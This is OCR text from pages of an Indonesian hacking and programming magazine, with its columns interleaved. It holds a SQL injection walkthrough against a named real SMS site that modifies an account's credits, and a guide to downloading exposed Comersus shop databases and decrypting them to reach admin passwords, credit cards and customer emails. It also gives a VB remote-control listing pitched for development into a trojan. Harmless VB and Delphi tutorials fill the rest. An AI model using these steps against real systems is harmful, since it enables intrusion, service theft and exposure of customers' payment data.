Gambar 3. Keyword allinurl dalam Google yang berguna sebagai serangan berikutnya.
alat bantu hacking anda.
Apabila browser kita adalah Internet Explorer, ada sebagian
situs yang tidak menampilkan error-nya, ini dikarenakan
opsi Show Friendly HTTP Error Messages diaktifkan. Untuk
itu kita perlu menonaktifkannya dengan cara menghilangkan
tanda centang di kotaknya.
Opsi ini dapat anda temukan di Tools > Internet Option >
Advanced cari opsinya di bagian Browsing lalu hilangkan
tanda centangnya dan klik tombol Apply. Sesudah itu apabila
anda menemui error page yang berisi HTTP 500 error -
internal server error- sebelum men-set opsi tadi, anda cukup
menekan tombol Refresh, lalu terlihatlah sudah error-nya.
Setelah kita tahu struktur database-nya, dengan pengetahuan
dasar dari belajar SQL kita dapat menghancurkan database itu
dengan perintah ' drop database [nama_database] atau drop table
[nama_table], namun bukan ini yang kita cari dalam SQL Inject-
ion karena kita tidak dapat apa-apa dari string tadi.

Gambar 4. Hasil dari search tadi dapat me-reveal semua situs


yang memiliki direktori khusus seperti admin login.

Lokasi SQL Injection


Lalu apakah setiap situs target kita harus di-inject lewat input
box-nya? Tidak juga. Kita bisa memasukan string-string SQL
di URL situs target.
Misalnya ada sebuah situs
www.target.com/moreinfo.cfm?ProductID=245
Nah, ketikkan string injeksi debuging SQL tadi ke address bar
anda dibelakang url target itu, contohnya:
www.target.com/moreinfo.cfm?ProductID=245' having 1=1--
atau juga anda hapus nilai produk dari URL tersebut dan
ganti dengan debugging codenya, sebagai contoh:
www.target.com/moreinfo?ProductID=' having 1=1-- Gambar 6. Error page yang menampilkan informasi berharga
tentang database sasaran.

Vol. IV No. 05 NeoTek 27


NeoTekno

Praktek SQL Injection 4. Setelah itu anda klik OK, dan account anda telah terbentuk.
Bagaimana misalnya kalau anda menemukan sebuah situs yang
menyediakan jasa kirim SMS dari web, namun setiap SMS ada
perhitungannya dalam sebuah string, dan kita harus membayar
dengan kartu kredit. Kita tidak akan melakukan carding disini,
namun kita dapat meng-inject database-nya agar string SMS
tadi diberi nilai dan bisa dipakai untuk mengirim SMS.
Untuk mengetahui lebih lanjut dari serangan SQL Injection,
perhatikan SQL Injection dari sebuah situs yang memberi
layanan SMS web ke handphone ini. Disini akan dijelaskan
string dasar SQL yang dapat berubah menjadi hal yang mem-
bahayakan suatu situs.
1. Cari target dengan Google, keywordnya
allinurl:.com/sendsms.asp. Inilah URL yang sering dipakai oleh
web site yang menyediakan jasa mengirim SMS.

5. Proses penyerangan akan dimulai, anda masuk ke members


direktory yang URL-nya adalah www.yepcell.com/members.asp
lalu masukan debuging code ' having 1=1- di kolom username
dan masukan sembarang password di kolom password.
2. Dalam contoh ini kita pakai www.yepcell.com, situs ini adalah
sebuah situs dari Timur Tengah yang menyediakan jasa pengi-
riman sms ke seluruh penjuru dunia dan menyediakan aksesori
handphone seperti, ringtone dan gambar.

3. Anda harus mendaftar dulu untuk menjadi anggota supaya bisa


mengirim SMS. Isikan data diri anda; semuanya boleh palsu
kecuali nomor handphone. Dalam contoh ini kita buat userID
dengan nama yamakasi. Sebelumnya anda dapat menguji apa-
kah situs ini memakai SQL. Cara mengujinya dapat pada input
box login dengan string yang telah dibahas di atas.
6. Nah, keluar error page-nya, disitu dijelaskan:
Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'YepCell_membersDB.UserID' is invalid in the select list because it
is not contained in an aggregate function and there is no GROUP
BY clause. nah kita tahu bahwa ada table Yepcell_membersDB dan
ada field UserID, ini adalah informasi berharga. untuk itu siapa tahu
ada lagi filed lainnya, jadi kita masukan string ' GROUP BY
YepCell_membersDB -

28 NeoTek Vol. IV No. 05


NeoTekno

7. Lalu akan muncul lagi error-nya


Error Type:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'YepCell_membersDB.Password' is invalid in the select list because
it is not contained in an aggregate function and there is no GROUP
BY clause nah ada lagi fieldnya yaitu Password, coba lagi kita inject
mungkin ada lagi field lainnya dengan ' GROUP BY
YepCell_membersDB.Password --
...tapi ternyata error-nya kembali ke awal lagi, berarti ada dua
field dalam satu table YepCell_membersDB

admin menemukan keganjilan di database-nya bisa saja dia


men-disable account kita bahkan men-disable pengiriman SMS
ke Indonesia. Hal ini terjadi pada situs www.phunkyphones.net

Apabila anda adalah web admin, semua ini dapat anda hindari
8. Karena sejak awal kita melakukan SQL Injection ini untuk me-
nambah Credits (string khusus penghitung SMS) di situs ini,
dengan men-disable special character atau wild character di
maka kita ubah account kita dengan injeksi ini. situs anda, dan membatasi input char.
Perintah UPDATE adalah perintah SQl yang berguna untuk Seperti halnya dengan mempelajari bahasa assembly untuk
mengubah atau memperbaiki data dalam suatu field di table meng-crack suatu program, mempelajari SQL tidaklah sulit
yang memuat field itu, dengan kode dan SQL Injection ini dapat meningkatan minat untuk mem-
' UPDATE [nama_table] set [field1] = [nilai1] where kondisi ; pelajari bahasa pemrograman database ini, agar nantinya
dapat menghasilkan sesuatu.
Jadi dengan info yang kita dapatkan dari error page yang tadi
maka kita dapat membuat string-nya Untuk melengkapi artikel ini silahkan anda mengunjungi
' UPDATE YepCell_membersDB set Credits = 100 where
link-link yang membahas tentang SQL Injection ini:
UserID ='yamakasi' www.sqlsecurity.com
bosen.net/releases/?id=35
kita klik submit lalu... www.spidynamics.com
www.sensepost.com
www.sony-ak.com
www.neoteker.or.id
Tutorial ini diharapkan hanya sebagai bahan pembelajaran dan
penulis tidak bertanggung jawab atas perbuatan yang ditimbulkan
dari artikel ini.
Dalam sebuah perbincangan di IRC ada seseorang dengan nickname
ftp_geo, dia bilang sekarang u belajar SQL untuk hacking tapi nanti
u make SQL untuk menghasilkan duit.
Regardz kepada sony-ak dan alphacentury atas tutor online-nya,
serta target-targetnya.

9. Nah, error... Tapi jangan khawatir tidak semua


berjalan mulus tapi kita cek sajalah account kita.
10. Jreeeng... terlihat Credits kita bertambah men-
jadi seratus. Artinya kita telah sukses mengin-
jeksi database situs itu dengan perintah SQL
dasar tadi dan bukan dengan cara carding.

Sekarang anda bisa ber-SMS ria sepuasnya.


Namun kadang-kadang SMS gateway situs
ini sering down dan bahkan apabila sang

Vol. IV No. 05 NeoTek 29


NeoTekno

WE B HAC K I N G
Comersus Shopping Cart Bug
Andi Ismayadi (Fuzk3_kendi@yahoo.com) membahas Comersus, shopping cart yang banyak
digunakan dalam situs-situs e-commerce. Database-nya dalam format Microsoft Access, yang
mudah di-download dan tool untuk meng-crack password database itu banyak tersedia.
ETELAH ADANYA BUG PADA CART32, KINI KEMBALI sedikit script pada browser kita, dapat men-download
S muncul bug pada shopcart baru yaitu Comersus.
Comersus merupakan salah satu software shopping
database Comersus itu. Bug ini pertama kali dipublikasi-
kan di Indonesia oleh sebuah Komunitas Security Indo-
cart berbasis ASP yang sifatnya open source, meskipun nesia http://bosen.net.
tetap komersial (bug Cart32 dan kelemahan Shopper.cgi Untuk mengeksploitasi bug ini anda perlu dibantu tool
dibahas di NeoTek III/05). yang dapat men-decrypt isi database tersebut. Tool itu
Comersus pertama kali di-release pada tahun 2000. Bela- dapat anda download di:
kangan ini diketahui memiliki sedikit kelemahan pada sis- http://bosen.net/releases/DecryptComersus.exe
temnya, seperti halnya kompatriotnya vsap dulu yang
sampai sekarang juga memiliki masalah yang hampir sama. Ada dua tools di sini. Yang satu merupakan programnya
dan satunya lagi teks yang berisi decrypter. Mari kita
Kelemahannya adalah kesalahan admin meletakkan infor- bahas lebih jauh tentang bug yang satu ini.
masi database-nya pada direktori publik sehingga dengan

Download Tool dan Mencari Sasaran

MASUK KE SITUS BOSEN.NET DAPATKAN LINK DOWNLOAD-NYA


1 Download tool-nya di http:bosen.net/releases, lihat ba-
gian bosen-tools.4.txt, yaitu Comersus Password Cracker by
2 Amati link ke situs tools-nya. Harus dua tools yang di-
download.
Thunder T.

MENCARI SITUS-SITUS E-COMMERCE MENCARI YANG MENGGUNAKAN COMERSUS


3 Buka THC search engine Google.com lalu pindah ke
bagian directory shop.
4 Ketikkan keyword seperti: comersus, powered by
comersus, comersus shopcart, ataupun lainnya yang
serupa.

30 NeoTek Vol. IV No. 05


NeoTekno

Download dan Database Password Cracking

BUKA SITUS SASARAN DOWNLOAD DATABASE


5 Buka situs Comersus sasaran,
lalu ketikkan bug Comersusnya:
6 Ketika anda menekan enter
setelah memasukkan bug
/comersus/database/comersus.mdb tadi, maka akan tampil re-
atau /database/comersus.mdb quest download dari target
yang akan men-download
databasenya ke hard disk
anda.

SAVE SEBAGAI FILE .REG MENGGUNAKAN DECRYPTER


6 Setelah di-save, database ini dapat dibuka menggunakan MS Access, karena for-
mat database-nya dibuat dengan MS Access. Setelah itu anda dapat membuka
8 Buka decrypternya.

bagian admin, credit card, atau costumer-nya untuk melihat data-data berharga
di sini. Database ini di-encrypt dan dilindungi password sehingga anda tidak
dapat langsung menerjemahkannya tanpa decrypter yang anda download.

DECRYPT PASSWORD MENGINTIP EMAIL JUGA Tip Pengamanan:


9 Copy-paste kan password tadi ke
kolom decrypter-nya lalu tekan
10 Selain mendapatkan data credit
card (kalau beruntung) anda da-
Bagi para pengusaha e-commerce
tombol Decrypt. Nah anda dapat pat juga melihat isi email para yang memakai shop cart ini, jangan
melihat password-nya setelah di costumer karena logikanya se- meletakkan database anda di direktori
decrypt tiap orang pasti memiliki pass- publik dan kosongkan data credit card
word yang sama pada setiap dan letakkan password ke tab lain
emailnya.
yang lebih aman.

Vol. IV No. 05 NeoTek 31


NeoTutor

VI S UAL BAS I C WO R KS H O P
Email Client dengan WINSOCK
Dalam Visual Basic Workshop kali ini, Wawan Ridwan (iniemailwawan@telkom.net)
kembali membahas cara membuat email client sendiri.
Kali ini dengan memanfaatkan Microsoft Winsock Control.

ASIH INGAT ARTIKEL SAYA TENTANG CARA MEMBUAT


M email client sendiri dengan Visual Basic? Artikel
tersebut berjudul Membuat Email Client Sendiri.
dan diterbitkan di NeoTek IV/03. Kalau tidak ingat atau
belum membaca artikel tersebut, ya sudah, baca saja
artikel ini.
Dalam artikel yang lalu, saya berbagi pengalaman tentang
cara membuat email client sendiri dengan memanfaatkan
file pustaka dvmailer.dll buatan Geocel. Sekarang saya
akan berbagi pengalaman lagi dengan anda tentang hal
yang sama. Akan tetapi dalam artikel ini, kita akan mem-
buat email client dengan memanfaatkan salah satu kompo-
nen dalam Visual Basic yakni Microsoft Winsock Control.

Microsoft Winsock Control


Winsocks (Window Sockets) adalah antarmuka (interface)
pemrograman jaringan yang digunakan untuk komunikasi
data pada berbagai macam protokol jaringan komputer. Se-
bagai sebuah API, Winsock bekerja berdasarkan konsep
socket. Socket adalah sarana transformasi data yang me- Gambar 1. Kotak dialog Components.
mungkinkan sebuah aplikasi jaringan mengakses data pada
sebuah jaringan komputer. Winsock didukung oleh bebe- Klik kanan di daerah tool-box, setelah popup
rapa protokol jaringan, yaitu Internet Protocol (IP), menu muncul klik Components, sesaat kemu-
IPX/SPX, NetBios, AppleTalk, ATM, dan Infrared Socket. dian muncul kotak dialog Components seperti
yang dapat anda lihat Gambar 1.
Perancangan Interface dan Kelengkapan Pada kotak dialog yang muncul seperti yang
Baiklah, tidak usah bertele-tele, takut halamannya habis. nampak pada Gambar 1, pilih Microsoft Win-
Kita akan mulai membuat program email client dengan sock Control 6.0 (SPS). Kemudian tekan OK.
Winsock. Sesaat kemudian komponen yang kita pilih
tadi akan terpasang pada tool-box (Gambar 2).
Buka Visual Basic, dalam kotak dialog New Project pilih
Standard EXE. Tempatkan dalam form komponen-kompo- Pada kotak tool-box double-click Microsoft
nen objek berikut ini: Winsock Control; hasilnya terlihat pada form Gambar 2.
yang sudah kita rancang tadi (Gambar 3). Kotak dialog
Enam buah object TextBox dengan rincian sbb: ToolBox
TextBox pertama beri nama txtNamaPenerima, digunakan untuk
memasukkan nama penerima email yang kita kirim.
TextBox kedua beri nama txtEmailPenerima, digunakan untuk
memasukkan alamat email penerima.
TextBox ketiga kita beri nama txtNamaPengirim, digunakan
untuk memasukkan nama pengirim email.
TextBox keempat kita beri nama txtEmailPengirim, digunakan
untuk memasukkan alamat email pengirim.
TextBox kelima kita beri nama txtEmailServer, digunakan untuk
memasukkan SMTP Server.
TextBox keenam kita beri nama txtPesan, digunakan untuk
memasukkan pesan email kita.
Pasangkan satu buah object CommandButton, beri nama
dengan cmdKirim, tombol ini nantinya digunakan untuk
mengeksekusi kode program kita.
Komponen yang terakhir yang harus kita pasangkan ada-
Gambar 3.
lah Microsoft Winsock Control. Silakan anda ambil di Hasil
tool-box lalu tempatkan dalam form. Jika control Winsock rancangan
tidak ada dalam tool-box, lakukan langkah berikut ini: form

32 NeoTek Vol. IV No. 05


NeoTutor

Menyiapkan Subrutin dan Fungsi 3. Subrutin KirimEmailnyaDong()


Selesai sudah rancangan form yang kita buat berikut ber- Langkah berikutnya kita buat lagi satu buah subrutin.
bagai komponen yang kita butuhkan untuk program yang Subrutin ini adalah kode utama yang akan menjalankan
kita inginkan. Langkah berikutnya adalah membuat misi kita yaitu mengirimkan email. Nama untuk rutin
beberapa subrutin dan fungsi yang akan menjalankan misi tersebut adalah KirimEmailnyaDong(). Berikut ini kode
program kita. rutin tersebut yang harus anda ketikkan:
1. Fungsi PeriksaForm() Sub KirimEmailnyaDong(SMTP_Server As String, NamaPengirim As
String, EmailPengirim As String, NamaPenerima As String,
Pertama, buatlah sebuah fungsi dengan nama PeriksaForm(). EmailPenerima As String, Judul As String, Pesan As String)
Fungsi tersebut akan kita gunakan untuk memeriksa for- Dim Tanggal As String
Dim Satu As String, Dua As String, Tiga As String
mulir yang diisi oleh user/pengguna. Fungsi tersebut akan Dim Empat As String, Lima As String, Enam As String
memberikan nilai kembalian False jika user mengisi for- Dim Tujuh As String
mulir tidak lengkap. Sebaliknya jika user mengisi form With Winsock1
email dengan lengkap dan benar maka nilai kembaliannya If .State = sckClosed Then
adalah True. Tanggal = Format(Date, "Ddd") & ", " & Format(Date, "dd Mmm
YYYY") & " " & Format(Time, "hh:mm:ss") & "" & " -0600"
Satu = "mail from: " & EmailPengirim & vbCrLf
Ketiklah kode untuk fungsi tersebut berikut: Dua = "rcpt to: " & EmailPenerima & vbCrLf
Tiga = "Date: " & Tanggal & vbCrLf ' Tanggal kirim email
Function PeriksaForm() Empat = "From: """ & NamaPengirim & """ <" &
PesanError = "" EmailPengirim & ">" + vbCrLf ' Email pengirim
If Len(txtNamaPenerima.Text) = 0 Then Lima = "To: " & EmailPenerima & vbCrLf ' Email penerima
PesanError = PesanError & "Kolom NAMA PENERIMA harus diisi!!" & vbCrLf Enam = "Subject: " & Judul & vbCrLf ' Judul email
End If Tujuh = Pesan & vbCrLf ' Pesan email
'------------------------------------------------ Sembilan = "X-Mailer: STMP Salome2005 "
If Len(txtEmailPenerima.Text) = 0 Then .LocalPort = 0
PesanError = PesanError & "Kolom EMAIL PENERIMA harus .Protocol = sckTCPProtocol ' Pilih protocol TCP
diisi!!" & vbCrLf .RemoteHost = SMTP_Server ' SMTP Server
End If .RemotePort = 25 ' Set port SMTP : 25
'-------------------------------------------------
If Len(txtNamaPengirim.Text) = 0 Then .Connect ' Sambuuuuuuuu.....ng
PesanError = PesanError & "Kolom NAMA PENGIRIM harus diisi!!" & vbCrLf Tunggu ("220")
End If StatusTxt.Caption = "Connecting...."
'-------------------------------------------------
If Len(txtEmailPengirim.Text) = 0 Then .SendData ("HELO Wawan Ridwan" & vbCrLf)
PesanError = PesanError & "Kolom EMAIL PENGIRIM harus diisi!!" & vbCrLf Tunggu ("250")
End If StatusTxt.Caption = "Connected"
'-------------------------------------------------
If Len(txtEmailServer.Text) = 0 Then .SendData (Satu)
PesanError = PesanError & "Kolom SMTP Server harus diisi!!" & vbCrLf StatusTxt.Caption = "Pesan dikirim..."
End If Tunggu ("250")
If Len(PesanError) <> 0 Then .SendData (Dua)
MsgBox PesanError, vbExclamation, "SalomeWinsock" Tunggu ("250")
PeriksaForm = False
Else .SendData ("data" & vbCrLf)
PeriksaForm = True Tunggu ("354")
End If
.SendData (Empat & Tiga & Sembilan & Lima & Enam & vbCrLf)
End Function .SendData (Tujuh & vbCrLf)
.SendData ("." & vbCrLf)
2. Subrutin Tunggu() Tunggu ("250")
Berikutnya kita buat subrutin Tunggu(). Ketikkan kode .SendData ("quit" & vbCrLf)
berikut ini: StatusTxt.Caption = "Disconnect..."
Tunggu ("221")
Sub Tunggu(KodeRespon As String)
Start = Timer .Close
While Len(Response) = 0 Else
Tmr = Start - Timer MsgBox (Str(.State))
DoEvents End If
If Tmr > 50 Then
MsgBox "SMTP service error!" & vbCrLf & "Tidak ada
response", 64, "SalomeWinsock" End With
Exit Sub
End If End Sub
Wend
While Left(Response, 3) <> KodeRespon Kode yang ketik tadi adalah kode utama yang bertugas
DoEvents mengirim email kita.
If Tmr > 50 Then
MsgBox "SMTP service error : " + KodeRespon + " Kode: " Pada bagian pertama kita siapkan header email.
+ Response, 64, "SalomeWinsock"
Exit Sub Berikutnya kita siapkan properties untuk Winsock,
End If protocol kita pilih TCP.
Wend
Response = "" RemoteHost kita masukkan dengan SMTP yang akan
diisikan oleh user dalam kolom object TextBox
End Sub txtEmailServer.

Vol. IV No. 05 NeoTek 33


NeoTutor

Finishing
Langkah berikutnya adalah memasukkan kode ke tombol
CmdKirim. Tombol ini yang nantinya akan menjadi pe-
micu pengiriman email kita. Silakan double-click tombol
tersebut dan masukkan kode program berikut ini:
Private Sub CmdKirim_Click()
If PeriksaForm() Then
KirimEmailnyaDong txtEmailServer.Text, txtNamaPengirim.Text,
txtEmailPengirim.Text, txtNamaPenerima.Text,
txtEmailPenerima.Text, txtJudul.Text, txtPesan.Text
StatusTxt.Caption = "Email dikirim..."
Beep
Close
End If
P
ERNAHKAH ANDA TERPIKIR UNTUK MENGENDALIKAN
End Sub
komputer orang lain atau mengutak-atik kompu-
ter orang lain tanpa menyentuh komputernya?
Error Checking Kegiatan remote control ini selalu merupakan topik yang
Jika koneksi mengalamai kegagalan Winsock akan mem- menarik, terlihat dari populernya software remote control
berikan event Winsock_Error. Untuk mengetahui apakah terang seperti VNC, Virtual PC, ataupun COOL! Remote
koneksi berhasil atau tidak kita perlu memasangkan kode Control, maupun yang gelap seperti misalnya berbagai
kecil dalam event tersebut. Double-click pada control jenis trojan.
Winsock dan pilih Private Sub Winsock1_Error, selanjut- Membuat program remote control sendiri sebenarnya mu-
nya ketik kode berikut ini: dah saja dan pada kesempatan kali ini penulis akan men-
Private Sub Winsock1_Error(ByVal Number As Integer, Description As
coba membahasnya untuk para pembaca setia NeoTek.
String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile Sebagai catatan, dari apa yang nantinya akan anda coba
As String, ByVal HelpContext As Long, CancelDisplay As Boolean) sesuai dengan yang telah diterangkan, jika sampai terjadi
MsgBox "Winsock Error: #" & Number & vbCrLf & _
Description hal-hal yang tidak diinginkan, janganlah menyalahkan
End Sub penulis. Juga demi menjaga kreativitas anda, penulis hanya
menyampaikan hal-hal yang dianggap perlu saja sesuai
Silakan Coba Kirim Email dengan informasi yang ingin disampaikan sebagai tam-
bahan pengetahuan bagi kita semua.
Sampai di sini program kita sudah selesai. Silakan anda
coba dengan mengisi form pengiriman email kita pada Microsoft Visual Basic
kolom-kolom yang semestinya. Dan tekan tombol kirim.
Program remote control berikut yang akan kita bahas kali
Dengan Microsoft Winsock Control selain untuk membuat ini, aslinya bukan buatan penulis sendiri, melainkan buat-
program emil client anda bisa membuat program program an teman belajar bersama penulis dalam mempelajari pe-
client server lain, seperti chat, file upload/download, dll. mrograman Visual Basic. Kami memang belajar bersama-
Selamat berkarya! sama dalam satu komputer, berbagai sumber yang yang
kami gali dari internet, diskusi bersama jika menemukan
kesulitan, dan lain-lain.
Baru Mengenal Visual Basic?
Penulis mengharapkan, semoga pembaca telah memiliki
Bagi yang baru mengenal Visual basic, ada baiknya
sedikit dasar pemograman ini agar tidak kesulitan dalam
membaca dulu artikel-artikel sebelumnya, khususnya
pembuatannya. Dalam pembahasan yang lalu-lalu penulis
dalam seri Visual basic Workshop sebagai berikut:
sendiri sudah berapa kali mengangkat mengenai pemro-
VB Workshop: Mengenal Visual Basic graman Visual basic.
NeoTek IV/02
VB Workshop: Membuat Notepad Sendiri Namun bila anda benar-benar awam dalam hal pemro-
NeoTek IV/03 graman Visual Basic, silakan buka kembali NeoTek IV/02
Visual Basic: Fake Program Buatan Sendiri yang membahas dasar-dasar Visual Basic.
NeoTek III/11
Sama seperti program remote control pada umumnya,
Visual Basic: Program Jahat Buatan Sendiri yang terdiri dari dua file *.exe yaitu:
NeoTek III/11
VB Workshop: Program Penggoda yang Berbahaya 1. Server.exe; sang Private Sub Form_Load()
NeoTek III/12 korban (yang di- Winsock1.LocalPort = 5578
VB Workshop: Password Cracker Buatan Sendiri tanam di komputer Winsock1.Listen
NeoTek IV/02 orang yang nan- End Sub

VB Workshop: Membuat Program Usil tinya akan diken-


Private Sub Winsock1_ConnectionRequest(ByVal
NeoTek IV/02 dalikan) requestID As Long
VB Workshop: Membuat Email Client Sendiri 2. Client.exe; sang If win.State <> sckClosed Then Winsock1.Close
Winsock1.Accept requestID
NeoTek IV/03 preman (pengen- End Sub
VB Workshop: Email Client dengan WINSOCK dali yang meja-
NeoTek IV/05 lankan pengen- Private Sub Winsock1_DataArrival(ByVal bytesTotal
VB Workshop: Remote Control Buatan Sendiri dalian terhadap As Long)
sang korban) Dim perintah As String
NeoTek IV/05 Winsock1.GetData perintah
VB Workshop: Screen Saver Buatan Sendiri Nb : Nama yang di- If perintah = "pain" Then
NeoTek IV/05 gunakan tidak harus Shell "pbrush.exe", vbNormalNoFocus
End If
demikian. Dapat nama End Sub Listing 1.
apa saja sesuka hati.

34 NeoTek Vol. IV No. 05


NeoTutor

VI S UAL BAS I C WO R KS H O P
Remote Control Buatan Sendiri
MA Rody Candera (odyxb@melva.org) bersama rekannya h3r01n@hotmail.com
berbagi pengalaman mengembangkan program remote control dengan Visual Basic
yang dapat anda kembangkan sendiri menjadi trojan.

INSERT COMPONENT KOMPONEN BARU PADA FORM FILE SYSOC.INF


1 Klik Project '> Components toolbar
Ctrl+T. Pada tab Control pilih
2 Klik untuk menanam di form de-
ngan pengaturan properties:
3 Selesai dengan perancangan form
dan pengaturan properties, selan-
Microsoft Winsock Control 6.0 Form1 jutnya adalah coding. Double click
dengan scroll ke bawah. Tick di Caption > Server.Exe (judul/title) pada form kemudian ketikkan
kotaknya, lalu Apply atau Enter. Visible > False (tampilan program kode listing programnya. Kode
Akan muncul komponen baru hilang saat dieksekusi) listing program dapat anda lihat
pada toolbox di sebelah kiri Name > Win pada Listing 1.

KOMPILASI SERVER.EXE MEMBUAT CLIENT.EXE TAMPILAN CLIENT.EXE


4 Selanjutnya kompilasi, mengubah
semua menjadi file *.exe. Caranya:
1 Buka project baru untuk
membuat client.exe: File > New
2 Rancang tampilan daripada form
untuk client.exe seperti tampak
File > Make Project1.exe beri nama Project. Akan muncul menu win- pada gambar dengan menam-
Server.exe pada kotak file name dow untuk memilih form yang bahkan komponen dari toolbox.
dari menu window Make Project. kita butuhkan. Pilih Standar.exe Setelah selesai, tambahkan juga
Selesai satu... lalu klik OK. komponen winsock.

Private Sub Form_Unload(Cancel As Integer)


Winsock1.Close
End Sub
Private Sub Command1_Click()
Winsock1.RemotePort = 5578
Winsock1.RemoteHost = Text1.Text
Winsock1.Connect
End Sub
Private Sub Command2_Click()
Dim perintah As String
perintah = "pain"
Winsock1.SendData perintah
End Sub Listing 2.

KODE PROGRAM CLIENT KOMPILASI CLIENT.EXE Kreativitas anda benar-benar diharapkan


3 Selanjutnya tuliskan kode program
untuk client.exe seperti terlihat
4 Terakhir adalah mengkompilasi.
File > Make Project1.exe... dan
untuk dapat mengembangkan program ini
yang sebenarnya dapat juga melakukan
pada gambar. Listing program pada menu window Make Project restart, shutdown, menghapus file, mem-
dapat terdapat pada Listing 2. kotak isian File Name masukkan buka window explorer, freeze monitor, dlsb.
Client.exe.
Source program ini dapat anda jumpai di
dalam CD NeoTek kali ini.

Vol. IV No. 05 NeoTek 35


NeoTutor

VI S UAL BAS I C WO R KS H O P
Screen Saver Buatan Sendiri
Dalam Visual Basic Workshop kali ini, MA Rody Candera (odyxb@melva.org) membahas cara
memanfaatkan untuk membuat screen saver sendiri yang akan menjadi komponen untuk
program-program lain di bahasan mendatang

ASANYA MAKIN ASIK SAJA MENJELA-


R jahi kemampuan Visual Basic (VB).
VB yang dianggap oleh sebagian
besar orang kurang begitu mampu untuk
menyaingi C, ternyata masih tetap asyik
untuk ditelaah program apa saja yang da-
pat dihasilkan dengan memanfaatkannya.
Saat ini semakin ramai program yang
dibuat dengan menggunakan VB baik
free maupun non-free hadir menghiasi
komputer di dunia, mungkin komputer
anda juga.
Kali ini adalah membuat screen saver
untuk menghiasi monitor anda, dan
pembahasannya akan dibuat berkesi-
nambungan dengan artikel-artikel ber-
ikutnya nanti sebagai hasil serapan
atau aplikasi dari pembahasan kali ini.
Pembahasan VB Workshop yang akan
mengikuti artikel ini nantinya adalah
PC Protector Buatan Sendiri, MP3
Player Buatan Sendiri, dan Encrypter
Gambar 2. Bidang kerja Visual Basic.
dan Decrypter Buatan Sendiri.
Anda sebagai pengguna komputer tentu mengerti benar 1. ToolBox
apa itu screen saver. Aplikasi screen saver telah menjadi ToolBbox, dalam ke Bahasa Indonesia artinya kira-
bagian yang tidak terlupakan hampir di semua sistem ope- kira Kotak Perkakas yang berisi komponen-
rasi yang ada. komponen yang sangat membantu untuk
Walaupun hanya menjadi bagian yang tidak begitu terlalu mewujudkan keinginan kita membuat program
penting, tetapi sampai saat ini aplikasi screen saver selalu menggunakan VB yang akan menjadi penghias
hadir sebagai pendukung sistem operasi yang diwakilinya. wajah atau layout dari program-program lain
buatan anda nantinya.
Menjalankan Visual Basic
Mari kita mulai teknis pembuatannya. Seperti biasa, aktif-
kan Visual Studio VB anda sebagai syarat utama untuk
membuat program dengan VB. Gambar 2. Bidang kerja Visual Basic.
Berikut dijelaskan langkah-langkah pembuatan sebagai
panduan anda. 2. Components
Timer
Pertama kita membutuhkan komponen Timer sejumlah 16
buah dan tidak dibuat menjadi control array. Control array
akan dijelaskan pada langkah yang berikutnya.
Image
Disini diperlukan 11 komponen Image dan dibuat menjadi
control array. Untuk membuat komponen image menjadi
control array adalah dengan melakukan copy pada kom-
ponen image1 lalu paste-kan pada form, yang akan menam-
pilkan lauyar dialog konfirmasi yang menanyakan apakah
akan menjadikannya control array. Tekan tombol Yes.
Gambar 1. Menjalankan Visual Basic
Lakukan berulang-ulang untuk ke-11 komponen image.
Konfirmasi hanya terjadi sekali saja.
36 NeoTek Vol. IV No. 05
NeoTutor

Form1
Klik Form untuk memulai menentu-
kan properties yang akan diwakilkan-
nya nanti. Pada windows Properties
cari dan sorot bagian BackColor, pilih
warna sesuai keinginan anda. Dalam
hal ini sebagai contoh dipilih warna
hitam. Untuk properties Form1, cukup
itu saja yang dilakukan

Gambar 7. Properties pada Form 1.

Timer
Anda sesuai untuk properties dari tiap-tiap komponen
timer berdasarkan tabel berikut:
No. Komponen Properties Nilai
1. Timer 1 Interval 0
2. Timer 2 Interval 20000
3. Timer 3 Interval 0
4. Timer 4 Interval 0
Tag 0
5. Timer 5 Interval 0
6. Timer 6 Interval 0
7. Timer 7 Interval 100
Tag 0
8. Timer 8 Interval 5000
Tag 0
9. Timer 9 Interval 1
10. Timer 10 Interval 1
11. Timer 11 Interval 1
12. Timer 12 Interval 1000
13. Timer 13 Interval 10
14. Timer 14 Interval 1
15. Timer 15 Interval 1
16. Timer 16 Interval 1

Image
Sebelum menentukan properties tiap-tiap komponen image,
Gambar 4 dan 5. Timer dan Image sebagai control array. anda membutuhkan sebuah icon. Untuk contoh beri-
kut penulis menggunakan contoh icon yang telah di-
sediakan oleh Microsoft Studio yaitu icon Smile.
3. Properties Untuk tiap komponen image properties yang ditentukan
Tahap berikutnya adalah menentukan properties. Ini pen- diperlukan Picture dan cari icon yang sesuai.
ting dilakukan demi menghasilkan program yang sesuai
dengan anda inginkan. Perhatikan window properties yang
terdapat di sebelah kanan dari window Visual Studio anda.
Klik event Properties untuk menentukan event yang akan
ditentukan propertiesnya (perhatikan Gambar 6b kedua
dari point ini).

a b c
Gambar 6. Menentukan properties. Gambar 8. Menggunakan suatu icon untuk komponen Image.

Vol. IV No. 05 NeoTek 37


NeoTutor

DELPHI WORKSHOP
Gambar 9.

Inno Setup
Dalam Delphi Workshop kali ini, Happy
Candraleka (cakrabirawa@mail.ru) membahas
cara mengemas program karya anda menjadi
suatu installer tunggal.

ADA PROSES AKHIR PEMBUATAN SUATU PAKET SOFTWARE,

Coding
P seorang software developer akan mengemas program
yang dibuatnya dalam bentuk installer. Dengan installer,
Anda sekarang berada pada tahap akhir yaitu menuliskan maka distribusi paket software hanya berupa file setup tunggal.
kode program. List kode program selengkapnya dapat anda Di samping itu, end-user yang akan menggunakan program
lihat pada source yang disertakan pada CD. tersebut cukup mengikuti wizard instalasi sehingga proses
instalasi program pada komputernya berjalan secara otomatis
Untuk menuliskan dan memudahkan.
kode, penempatan
Pada tutorial kali ini
penulisannya pada
akan digunakan pe-
kode editor. Untuk
rangkat pembuat
mengaktifkan kode installer Inno Setup
editor, bisa anda versi 3.0.7 yang
mulai dari menu karya Jordan Russell.
standar View > Alasan dipilihnya
Code atau mengklik perangkat ini adalah
gambar pertama di karena merupakan
window Project. perangkat untuk
membuat installer
yang cukup baik,
memenuhi kebu-
tuhan para software DOWNLOAD & INSTALASI
developer secara
umum dalam mem-
1 Masuk ke http://www.jrsoftware.org
untuk mendapatkan Inno Setup 3.
buat installer. File yang Anda dapatkan adalah
